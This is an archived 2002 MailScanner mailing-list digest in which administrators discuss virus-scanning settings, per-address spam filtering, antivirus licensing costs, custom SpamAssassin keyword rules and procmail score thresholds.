<006001c25e07$cbaeae80$2c8bded5@chello.hu> > and difficult to remove. Sophos explanation for disinfection is pretty > long. User give up before try. http://www.bitdefender.com/html/free_tools.php http://www.bitdefender.com/download/download.php?file=AntiKlez.exe G. From erich at OLYPEN.COM Tue Sep 17 06:13:52 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:40 2006 Subject: Virus Scanning = no Message-ID: I set Virus Scanning = no in mailscanner.conf but it is still detecting and removing viruses. What's up with that? 3.22-13, btw. Regards, Eric From danieltan at shopnsave.com.sg Tue Sep 17 06:27:04 2002 From: danieltan at shopnsave.com.sg (Daniel Tan) Date: Thu Jan 12 21:15:40 2006 Subject: Virus Scanning = no References: Message-ID: <00d901c25e0a$dc948500$3900a8c0@Daniel> did u restart mailscanner? ----- Original Message ----- From: "Eric H" To: Sent: Tuesday, September 17, 2002 1:13 PM Subject: Virus Scanning = no I set Virus Scanning = no in mailscanner.conf but it is still detecting and removing viruses. What's up with that? 3.22-13, btw. Regards, Eric From email at ace.net.au Tue Sep 17 06:48:32 2002 From: email at ace.net.au (Peter Nitschke) Date: Thu Jan 12 21:15:40 2006 Subject: Virus Scanning = no In-Reply-To: References: Message-ID: <200209171518320021.0DB9B32C@smtp1.ace.net.au> It might not be scanning, but check filename.rules.conf *********** REPLY SEPARATOR *********** On 16/09/2002 at 10:13 PM Eric H wrote: >I set Virus Scanning = no in mailscanner.conf but it is still >detecting and removing viruses. What's up with that? 3.22-13, btw. > >Regards, >Eric From mailscanner at ecs.soton.ac.uk Tue Sep 17 09:28:47 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: Selective spam filtering? In-Reply-To: References: <5.1.0.14.2.20020916202403.0344c3e0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020917092816.034f6a40@imap.ecs.soton.ac.uk> At 23:39 16/09/2002, you wrote: >Perfect...that is what I need. Any idea on when V4? Few weeks away yet. I'll probably release a beta version of the sendmail code first. >======================= > >At 16:04 16/09/2002, you wrote: > >Any more thoughts? > >In V4, it will be something like > >Spam Checks = /usr/local/MailScanner/etc/rules/spam.checks.rules > >then in that file >To: account1@domain.com yes >To: account2@domain.com yes >To: account3@domain.com yes >To: *@domain.com no > >Then it will do spam scanning for account1,2,3 and not for any of the other >accounts at domain.com. > >For those of you that are wondering, this is the form of the generalised >ruleset configuration system in V4, with which you can pull all sorts of >useful tricks (yes, you can even make that outgoing mail directory >(/var/spool/mqueue) dependent on the addressing of the message, so you can >send incoming mail into 1 queue while sending outbound mail into another >queue if you want to). There are a few other rule types other than the 2 >above, leaving you the ability to test on just about anything to do with >where the mail came from or where it is going. > >I haven't yet managed to come up with the reason *why* you might want to do >some of the more obscure configurations that are possible, but I'm working >on it :-) > > > >> I'll have to think about that one... > > > >At 16:43 13/09/2002, you wrote: > > >I have been playing around with the whitelist, but I can't seem to figure > > >out the best way to accomplish what I need. > > > > > >Basically I have a domain, somedomain.com, which has about 3000 email > > >accounts on another mail server. Only about 100 of the accounts want >spam > > >filtering. From what I can see with the whitelist, I need to put 2990 >To: > > >accounts in the whitelist. I guess it could be done, but it would be a > > >management nightmare. > > > > > >Is there an easier way to just identify the 100 accounts as getting > > >filtered, while leaving the other 2990 unfiltered. Thanks. > > > > > >At 02:56 13/09/2002, you wrote: > > > >I am currently using mailscanner with spamassassin and sendmail. I am > >only > > > >using the spam feature to filter spam for specific domains that are > >hosted > > > >on other mail servers. Can I only spam filter for certain addresses in > >the > > > >domain, while letting everything else through? > > > > > > > >someone@somedomain.com gets filtered > > > >*@somedomain.com no filtering > > > > > > > >Is this possible with my config? > > > > > >Yes, the spam whitelist lets you do exactly this. Take a look at the >sample > > >supplied spam.whitelist.conf file. > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From brett at BRABYS.CO.ZA Tue Sep 17 12:28:39 2002 From: brett at BRABYS.CO.ZA (Brett Geer) Date: Thu Jan 12 21:15:41 2006 Subject: [OT] Mailscanner and McAfee In-Reply-To: <5.1.0.14.2.20020916200929.022af250@imap.ecs.soton.ac.uk> References: <000e01c25cc7$24a1b560$4c00a8c0@escritoriomundial.com.br> <5.1.0.14.2.20020916200929.022af250@imap.ecs.soton.ac.uk> Message-ID: <1032262119.10159.14.camel@brett> Don't see why, if you think about it, the app is not running as a daemon, it's being called to scan a file, just as if you were running it as a command line scanner. Only way to know I suppose would be NAI support, but has anyone ever had any joy there? brett On Mon, 2002-09-16 at 21:10, Julian Field wrote: > At 03:18 16/09/2002, you wrote: > >Continuing on the licencing front. Is McAfee command line uvscan a > >server licene or do we have to pay by no of mailboxes? Not very clear to > >me. > > You probably have to paid per mailbox. F-Prot are about the only people who > do per-server licensing. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- ------------------------------------------------------------------- This is UNIX country, on a quiet night you can hear Windows reboot From support at INVICTANET.CO.UK Tue Sep 17 13:07:22 2002 From: support at INVICTANET.CO.UK (InvictaNet Support) Date: Thu Jan 12 21:15:41 2006 Subject: [OT] Mailscanner and McAfee In-Reply-To: <1032262119.10159.14.camel@brett> Message-ID: I know it's not McAfee, but when I bought my copy of Sophos (via a Sophos Reseller and after conversations with Sophos themselves) I ended up with a license allowing use on one server and up to 5 workstations running any os. The cost was ~?300 and I now run the server copy on Freebsd 4.x and the workstation copies on a mixture of W98, W2k and Freebsd. I can't see a financial problem with that, I think it excellent value! Martyn Routley ----------------------------------------------------- InvictaNet - The Internet in Plain English, Guaranteed http://www.invictanet.co.uk info@invictanet.co.uk phone: 08707 440180 fax: 08707 440181 ------------------------------------------------------ Please Note: All services are provided on the basis that they are business to business and that the Consumer Protection (Distance Selling) Regulations 2000 do not apply. ----------------------------------------------------- -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Brett Geer Sent: Tuesday, September 17, 2002 12:29 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [OT] Mailscanner and McAfee Don't see why, if you think about it, the app is not running as a daemon, it's being called to scan a file, just as if you were running it as a command line scanner. Only way to know I suppose would be NAI support, but has anyone ever had any joy there? brett On Mon, 2002-09-16 at 21:10, Julian Field wrote: > At 03:18 16/09/2002, you wrote: > >Continuing on the licencing front. Is McAfee command line uvscan a > >server licene or do we have to pay by no of mailboxes? Not very clear to > >me. > > You probably have to paid per mailbox. F-Prot are about the only people who > do per-server licensing. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- ------------------------------------------------------------------- This is UNIX country, on a quiet night you can hear Windows reboot -- This message has been scanned for viruses and dangerous content by the http://www.anti84787.com MailScanner, and is believed to be clean. From smohan at VSNL.COM Tue Sep 17 13:31:27 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:41 2006 Subject: [OT] Mailscanner and McAfee In-Reply-To: Message-ID: True. However, the server licence cannot be used to scan email bags of multiple users on the same machine as per their licence. Sophos requires you to buy a 1000 user licence if you have 100 emailbags on a mail server as per their lic policy. The explanation I got was that if we buy 5 client licences, one of the licences gets converted to a server licence! Check it out. Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of InvictaNet Support Sent: 17 September 2002 17:37 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [OT] Mailscanner and McAfee I know it's not McAfee, but when I bought my copy of Sophos (via a Sophos Reseller and after conversations with Sophos themselves) I ended up with a license allowing use on one server and up to 5 workstations running any os. The cost was ~?300 and I now run the server copy on Freebsd 4.x and the workstation copies on a mixture of W98, W2k and Freebsd. I can't see a financial problem with that, I think it excellent value! Martyn Routley ----------------------------------------------------- InvictaNet - The Internet in Plain English, Guaranteed http://www.invictanet.co.uk info@invictanet.co.uk phone: 08707 440180 fax: 08707 440181 ------------------------------------------------------ Please Note: All services are provided on the basis that they are business to business and that the Consumer Protection (Distance Selling) Regulations 2000 do not apply. ----------------------------------------------------- -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Brett Geer Sent: Tuesday, September 17, 2002 12:29 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [OT] Mailscanner and McAfee Don't see why, if you think about it, the app is not running as a daemon, it's being called to scan a file, just as if you were running it as a command line scanner. Only way to know I suppose would be NAI support, but has anyone ever had any joy there? brett On Mon, 2002-09-16 at 21:10, Julian Field wrote: > At 03:18 16/09/2002, you wrote: > >Continuing on the licencing front. Is McAfee command line uvscan a > >server licene or do we have to pay by no of mailboxes? Not very clear to > >me. > > You probably have to paid per mailbox. F-Prot are about the only people who > do per-server licensing. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- ------------------------------------------------------------------- This is UNIX country, on a quiet night you can hear Windows reboot -- This message has been scanned for viruses and dangerous content by the http://www.anti84787.com MailScanner, and is believed to be clean. From support at INVICTANET.CO.UK Tue Sep 17 14:25:48 2002 From: support at INVICTANET.CO.UK (InvictaNet Support) Date: Thu Jan 12 21:15:41 2006 Subject: FW: [OT] Mailscanner and McAfee Message-ID: Oops, sent it from the wrong email address -----Original Message----- From: InvictaNet Customer Support [mailto:martyn@support.invictanet.co.uk] Sent: Tuesday, September 17, 2002 2:18 PM To: MailScanner mailing list Subject: RE: [OT] Mailscanner and McAfee I can not see anything in the license I have that stops or restricts me from using MailScanner and Sophos to scan incoming emails. I think you may be referring to the "Sophos Anti-Virus Mail-Monitor for SMTP for Unix" This is a separate product that is licensed on a per mailbox basis. Each month you are required to email Sophos and tell them how many boxes you are scanning, they then invoice you for that number. The costs start at ?0.39 per mailbox per month for 0-999 mailboxes and drop to ?0.08 per mailbox per month for 500,000 mailboxes. Just think what a wonderful bargain we are getting from Julian - with Anti Spam thrown in as well. Martyn Routley ----------------------------------------------------- InvictaNet - The Internet in Plain English, Guaranteed http://www.invictanet.co.uk info@invictanet.co.uk phone: 08707 440180 fax: 08707 440181 ------------------------------------------------------ Please Note: All services are provided on the basis that they are business to business and that the Consumer Protection (Distance Selling) Regulations 2000 do not apply. ----------------------------------------------------- -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of S Mohan Sent: Tuesday, September 17, 2002 1:31 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [OT] Mailscanner and McAfee True. However, the server licence cannot be used to scan email bags of multiple users on the same machine as per their licence. Sophos requires you to buy a 1000 user licence if you have 100 emailbags on a mail server as per their lic policy. The explanation I got was that if we buy 5 client licences, one of the licences gets converted to a server licence! Check it out. Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of InvictaNet Support Sent: 17 September 2002 17:37 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [OT] Mailscanner and McAfee I know it's not McAfee, but when I bought my copy of Sophos (via a Sophos Reseller and after conversations with Sophos themselves) I ended up with a license allowing use on one server and up to 5 workstations running any os. The cost was ~?300 and I now run the server copy on Freebsd 4.x and the workstation copies on a mixture of W98, W2k and Freebsd. I can't see a financial problem with that, I think it excellent value! Martyn Routley ----------------------------------------------------- InvictaNet - The Internet in Plain English, Guaranteed http://www.invictanet.co.uk info@invictanet.co.uk phone: 08707 440180 fax: 08707 440181 ------------------------------------------------------ Please Note: All services are provided on the basis that they are business to business and that the Consumer Protection (Distance Selling) Regulations 2000 do not apply. ----------------------------------------------------- -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Brett Geer Sent: Tuesday, September 17, 2002 12:29 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [OT] Mailscanner and McAfee Don't see why, if you think about it, the app is not running as a daemon, it's being called to scan a file, just as if you were running it as a command line scanner. Only way to know I suppose would be NAI support, but has anyone ever had any joy there? brett On Mon, 2002-09-16 at 21:10, Julian Field wrote: > At 03:18 16/09/2002, you wrote: > >Continuing on the licencing front. Is McAfee command line uvscan a > >server licene or do we have to pay by no of mailboxes? Not very clear to > >me. > > You probably have to paid per mailbox. F-Prot are about the only people who > do per-server licensing. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- ------------------------------------------------------------------- This is UNIX country, on a quiet night you can hear Windows reboot -- This message has been scanned for viruses and dangerous content by the http://www.anti84787.com MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by the http://www.anti84787.com MailScanner, and is believed to be clean. From andersan at LTKALMAR.SE Tue Sep 17 14:59:52 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:41 2006 Subject: Multiple cpu? Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB2C@lkl22.ltkalmar.se> HI I know I've seen something about the support for more then one cpu but can't find it. Since we are migratin from TFS and NT to sendmail and MS I wonder how the 2 cpu is on MS? I guess all AV-progs are able to use it but wonder if its worth it if MS dont? Kind regards /Anders From info at PRO-INVEST.CA Tue Sep 17 15:38:41 2002 From: info at PRO-INVEST.CA (Mark Tavares) Date: Thu Jan 12 21:15:41 2006 Subject: Spamassasin Config Message-ID: <000c01c25e57$edf7f050$9000a8c0@Mark2kNew> Hello, I know, I know this isn't a spamassasin mailing however we are using mailscanner and spamassasin so I figured I could gleam off the knowledge of 50 million users world wide. enough fluff... Is there a way to stop any and all mailings that come to our server with any sexual slant whatsoever without relying on a hit count from spamassasin? We have set our max hit count from 20 to 15 and that has helped however we would like to prevent any mail with PORN, RAPE...etc from reaching our users period. Thanks, Mark -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020917/cf969266/attachment.html From chicks at CHICKS.NET Tue Sep 17 15:37:54 2002 From: chicks at CHICKS.NET (Christopher Hicks) Date: Thu Jan 12 21:15:41 2006 Subject: it's [OT] but it's short Re: [MAILSCANNER] Feature, maybe misfeature In-Reply-To: <1032207021.28021.35.camel@dbeauchemin.si.usherb.ca> Message-ID: On Mon, 16 Sep 2002, Denis Beauchemin wrote: > I'd recommend using: > find . -type f -mtime +14 -print0 | xargs -0 rm -f True enough, but anyone that's running commercial UNIX without a gnu toolset will find that those options aren't available. -- Camels may be nasty beasts, but they're the only way to get through the desert. From S.R.Patterson at SOTON.AC.UK Tue Sep 17 15:46:34 2002 From: S.R.Patterson at SOTON.AC.UK (Patterson S.R.) Date: Thu Jan 12 21:15:41 2006 Subject: Spamassasin Config Message-ID: Put some spamassassin rules in the configuration like: body MY_PORN1 /\bporn\b/i body MY_PORN2 /\brape\b/i ... score MY_PORN1 1000 score MY_PORN2 1000 ... That should pretty much gurantee they're identified I'd think? Got to say it might not be too wise though, there are all sorts of things that would get matched. For example: "I consider the use of motor vehicles to be tantamount to the rape of the natural world" -- Steven Patterson MSci OCP. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Information Systems Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc -----Original Message----- From: Mark Tavares [mailto:info@PRO-INVEST.CA] Sent: 17 September 2002 15:39 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin Config Hello, I know, I know this isn't a spamassasin mailing however we are using mailscanner and spamassasin so I figured I could gleam off the knowledge of 50 million users world wide. enough fluff... Is there a way to stop any and all mailings that come to our server with any sexual slant whatsoever without relying on a hit count from spamassasin? We have set our max hit count from 20 to 15 and that has helped however we would like to prevent any mail with PORN, RAPE...etc from reaching our users period. Thanks, Mark -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020917/154357bd/attachment.html From billa at STERLING.NET Tue Sep 17 15:50:17 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:41 2006 Subject: Selective spam filtering? In-Reply-To: <5.1.0.14.2.20020917092816.034f6a40@imap.ecs.soton.ac.uk> Message-ID: Thanks a bunch. > At 23:39 16/09/2002, you wrote: > >Perfect...that is what I need. Any idea on when V4? > > Few weeks away yet. I'll probably release a beta version of the sendmail > code first. > > >======================= > > > >At 16:04 16/09/2002, you wrote: > > >Any more thoughts? > > > >In V4, it will be something like > > > >Spam Checks = /usr/local/MailScanner/etc/rules/spam.checks.rules > > > >then in that file > >To: account1@domain.com yes > >To: account2@domain.com yes > >To: account3@domain.com yes > >To: *@domain.com no > > > >Then it will do spam scanning for account1,2,3 and not for any > of the other > >accounts at domain.com. > > > >For those of you that are wondering, this is the form of the generalised > >ruleset configuration system in V4, with which you can pull all sorts of > >useful tricks (yes, you can even make that outgoing mail directory > >(/var/spool/mqueue) dependent on the addressing of the message, > so you can > >send incoming mail into 1 queue while sending outbound mail into another > >queue if you want to). There are a few other rule types other than the 2 > >above, leaving you the ability to test on just about anything to do with > >where the mail came from or where it is going. > > > >I haven't yet managed to come up with the reason *why* you might > want to do > >some of the more obscure configurations that are possible, but > I'm working > >on it :-) > > > > > >> I'll have to think about that one... > > > > > >At 16:43 13/09/2002, you wrote: > > > >I have been playing around with the whitelist, but I can't > seem to figure > > > >out the best way to accomplish what I need. > > > > > > > >Basically I have a domain, somedomain.com, which has about 3000 email > > > >accounts on another mail server. Only about 100 of the accounts want > >spam > > > >filtering. From what I can see with the whitelist, I need > to put 2990 > >To: > > > >accounts in the whitelist. I guess it could be done, but it > would be a > > > >management nightmare. > > > > > > > >Is there an easier way to just identify the 100 accounts as getting > > > >filtered, while leaving the other 2990 unfiltered. Thanks. > > > > > > > >At 02:56 13/09/2002, you wrote: > > > > >I am currently using mailscanner with spamassassin and > sendmail. I am > > >only > > > > >using the spam feature to filter spam for specific domains that are > > >hosted > > > > >on other mail servers. Can I only spam filter for certain > addresses in > > >the > > > > >domain, while letting everything else through? > > > > > > > > > >someone@somedomain.com gets filtered > > > > >*@somedomain.com no filtering > > > > > > > > > >Is this possible with my config? > > > > > > > >Yes, the spam whitelist lets you do exactly this. Take a look at the > >sample > > > >supplied spam.whitelist.conf file. > > > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From Q.G.Campbell at NEWCASTLE.AC.UK Tue Sep 17 16:05:06 2002 From: Q.G.Campbell at NEWCASTLE.AC.UK (Quentin Campbell) Date: Thu Jan 12 21:15:41 2006 Subject: Spamassasin Config Message-ID: Mark Add some local SpamAssassin rules into /etc/mail/spamassassin/local.cf and set the scores to appropriately high values. You will need to be a bit clever about the pattern matching you do when looking for the strings you want to detect. Otherwise you will generate false positives. If you want some example rules to work from look at the full set of rules under /usr/share/spamassassin. I have added about 160 local rules at this site to tune the way SpamAssasin works. The local overide rules and scores are in /etc/mail/spamassassin/local.cf. As well as the rules described above this file also includes local overides such as for "required_hits" (which we have set at 9) and for disabling blacklisting by SA. If you maintain local rules in the way recommended by the SpamAssassin docs, and described above, BEWARE of the "spam.assassin.prefs.conf" file provided by MailScanner. This file will overide any other local changes to SpamAssassin that you have made in the places recommended by the SpamAssassin docs. In our case the "spam.assassin.prefs.conf" file should be empty OR all lines should be comments OR the "SpamAssassin Pref File =" entry in mailscanner.conf should be null OR should point at (for this site) "/etc/mail/spamassassin/local.cf". One final point. Although this will be obvious to most, I do my testing of changes to local SpamAssassin rules as a non-root user and by using "spamassassin -t" for applying the new rules aginst test messages. The rules file for development are in the file ~myloginid/.spamassassin/user_prefs. This way the rules I am developing are not seen by the production MailScanner/ SpamAssassin which runs as root. However note that when doing the testing as the non-root user the local rules in /etc/mail/spamassassin/local.cf need to be visible to "spamassassin -t". Make sure that the "local.cf" file is "read" to everyone for this to be the case. Quentin --- PHONE: +44 191 222 8209 Computing Service, University of Newcastle FAX: +44 191 222 8765 Newcastle upon Tyne, United Kingdom, NE1 7RU. ------------------------------------------------------------------------ "Any opinion expressed above is mine. The University can get its own." -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: 17 September 2002 15:39 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin Config Hello, I know, I know this isn't a spamassasin mailing however we are using mailscanner and spamassasin so I figured I could gleam off the knowledge of 50 million users world wide. enough fluff... Is there a way to stop any and all mailings that come to our server with any sexual slant whatsoever without relying on a hit count from spamassasin? We have set our max hit count from 20 to 15 and that has helped however we would like to prevent any mail with PORN, RAPE...etc from reaching our users period. Thanks, Mark From billa at STERLING.NET Tue Sep 17 16:15:11 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:41 2006 Subject: Best practices for white and black lists? Message-ID: I am trying to figure our the best method for creating white and black lists. It seems like there are several places to put these entries mailscanner/spamassasin/or sendmail. The first scenario is mail that did not get tagged as spam but should have. Should I put in the ip in the access sendmail file or is ther a black list for mailscanner? Is there a simpler way? The second scenario is something get's reported as spam but should not. Can I use the auto whitelist feature? If so, how does it work, I couldnt find any information on configuratio or use? What is the best way? There probably is a million ways to cut it, but I am looking for best practices that seem to work for people. My goal is to limit the amount of management and using automated features would be great. Thanks. From info at pro-invest.ca Tue Sep 17 16:25:25 2002 From: info at pro-invest.ca (Mark Tavares) Date: Thu Jan 12 21:15:41 2006 Subject: Spamassasin Config In-Reply-To: Message-ID: Wow...thanks for the super reply..will implement and let you know. Thanks, again Mark -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Quentin Campbell Sent: Tuesday, September 17, 2002 11:05 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Spamassasin Config Mark Add some local SpamAssassin rules into /etc/mail/spamassassin/local.cf and set the scores to appropriately high values. You will need to be a bit clever about the pattern matching you do when looking for the strings you want to detect. Otherwise you will generate false positives. If you want some example rules to work from look at the full set of rules under /usr/share/spamassassin. I have added about 160 local rules at this site to tune the way SpamAssasin works. The local overide rules and scores are in /etc/mail/spamassassin/local.cf. As well as the rules described above this file also includes local overides such as for "required_hits" (which we have set at 9) and for disabling blacklisting by SA. If you maintain local rules in the way recommended by the SpamAssassin docs, and described above, BEWARE of the "spam.assassin.prefs.conf" file provided by MailScanner. This file will overide any other local changes to SpamAssassin that you have made in the places recommended by the SpamAssassin docs. In our case the "spam.assassin.prefs.conf" file should be empty OR all lines should be comments OR the "SpamAssassin Pref File =" entry in mailscanner.conf should be null OR should point at (for this site) "/etc/mail/spamassassin/local.cf". One final point. Although this will be obvious to most, I do my testing of changes to local SpamAssassin rules as a non-root user and by using "spamassassin -t" for applying the new rules aginst test messages. The rules file for development are in the file ~myloginid/.spamassassin/user_prefs. This way the rules I am developing are not seen by the production MailScanner/ SpamAssassin which runs as root. However note that when doing the testing as the non-root user the local rules in /etc/mail/spamassassin/local.cf need to be visible to "spamassassin -t". Make sure that the "local.cf" file is "read" to everyone for this to be the case. Quentin --- PHONE: +44 191 222 8209 Computing Service, University of Newcastle FAX: +44 191 222 8765 Newcastle upon Tyne, United Kingdom, NE1 7RU. ------------------------------------------------------------------------ "Any opinion expressed above is mine. The University can get its own." -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: 17 September 2002 15:39 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin Config Hello, I know, I know this isn't a spamassasin mailing however we are using mailscanner and spamassasin so I figured I could gleam off the knowledge of 50 million users world wide. enough fluff... Is there a way to stop any and all mailings that come to our server with any sexual slant whatsoever without relying on a hit count from spamassasin? We have set our max hit count from 20 to 15 and that has helped however we would like to prevent any mail with PORN, RAPE...etc from reaching our users period. Thanks, Mark From LISTSERV at JISCMAIL.AC.UK Tue Sep 17 16:02:40 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:41 2006 Subject: MAILSCANNER: bovati@MONDADORI.COM requested to join Message-ID: <200209171502.QAA29039@magpie.ecs.soton.ac.uk> Tue, 17 Sep 2002 16:02:40 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Mirko Bovati . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER bovati@MONDADORI.COM Mirko Bovati The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+bovati%40MONDADORI.COM+Mirko+Bovati&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From erich at OLYPEN.COM Tue Sep 17 17:53:22 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:41 2006 Subject: Virus Scanning = no In-Reply-To: <200209171518320021.0DB9B32C@smtp1.ace.net.au> Message-ID: On Tue, 17 Sep 2002, Peter Nitschke wrote: > It might not be scanning, but check filename.rules.conf > > *********** REPLY SEPARATOR *********** > > On 16/09/2002 at 10:13 PM Eric H wrote: > > >I set Virus Scanning = no in mailscanner.conf but it is still > >detecting and removing viruses. What's up with that? 3.22-13, btw. Ah, so that would be an independent mechanism? That would explain it I think, even though the scanner (Sophos, F-prot, etc) wouldn't be unpacking and scanning attachments MailScanner would still tag messages matching filename.rules.conf with the {VIRUS?} tag? (and I did restart MailScanner) Nifty. Eric From erich at OLYPEN.COM Tue Sep 17 20:22:53 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:41 2006 Subject: end user head space Message-ID: I forgot, is end user headspace measured in micrometers or Angstroms? Anyway, end users need things REALLY simple, like three big dumb buttons to choose whether they want their spam protection level at LOW, MEDIUM or HIGH. What would be reasonable values to assign? Low>7, med>5, high>4 or something like that? I know this is more of a procmail question but I'm thinking of a rule something like :0H * ^X-MailScanner-SpamCheck: SpamAssassin (score>4.9 .spam where anything scoring higher than 4.9 would be caught, but I don't even know if you can do comparative arithmetic in procmail rules. Eric From jim at ENTROPHY-FREE.NET Tue Sep 17 20:47:26 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:41 2006 Subject: end user head space In-Reply-To: References: Message-ID: <1032292046.1839.31.camel@wilowisp.dynetics.com> On Tue, 2002-09-17 at 14:22, Eric H wrote: > I forgot, is end user headspace measured in micrometers or Angstroms? > > Anyway, end users need things REALLY simple, like three big dumb buttons > to choose whether they want their spam protection level at LOW, MEDIUM > or HIGH. > > What would be reasonable values to assign? Low>7, med>5, high>4 or > something like that? > > I know this is more of a procmail question but I'm thinking of a rule > something like > > :0H > * ^X-MailScanner-SpamCheck: SpamAssassin (score>4.9 > .spam > > where anything scoring higher than 4.9 would be caught, but I > don't even know if you can do comparative arithmetic in procmail > rules. > Comparative arithmetic in a number of filters is difficult, if not impossible. I use a modified V3 scanner that changes the SpamAssassin header in the message to look like: X-Mailscanner-SpamCheck: (#####) score=5.1... I round the score and let the #'s indicate the result. That makes filters easy, in pseudo code: if SpamCheck header contains "(####" then discard And to make it easy for users I've written an simple php interface for Cyrus Sieve that lets the user simply select their "spam tolerance", user whitelist and forwarding. It probably wouldn't be very difficult to modify it to generate procmail filters. Per Julian, this capability will be in the upcoming V4 release, but I'd be glad to share my modifications if you want them. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From jim at ENTROPHY-FREE.NET Tue Sep 17 20:50:42 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:41 2006 Subject: multiple mailscanner instances? In-Reply-To: References: Message-ID: <1032292243.1839.35.camel@wilowisp.dynetics.com> On Fri, 2002-09-13 at 19:22, Eric H wrote: > On Fri, 13 Sep 2002, Jim Levie wrote: > > > Yes, it is possible to run more than one instance of MailScanner, but > > it's a little more complicated. What needs to happen in that case is > > that Sendmail is configured to drop inbound mail into mqueue.in. Then > > you need something else that picks up qf/df pairs from the input queue > > and distributes those to two or more MailScanner work queues. Each of > As promised, I've cleaned up the code that I use to manage a multi-process V3 MailScanner and documented the setup and operation. Rather that fill up the list server with email attachments I've made it available on my web server. Take a look at http://www.entrophy-free.net/multi-scanner.html -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From LISTSERV at JISCMAIL.AC.UK Tue Sep 17 20:51:32 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:41 2006 Subject: MAILSCANNER: ianz@QUARTERLEAF.COM requested to join Message-ID: <200209171951.UAA02586@magpie.ecs.soton.ac.uk> Tue, 17 Sep 2002 20:51:32 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Ian Zapczynski . The following subscription options have been requested: HTML DIGEST. You can, at your discretion, send the following command to 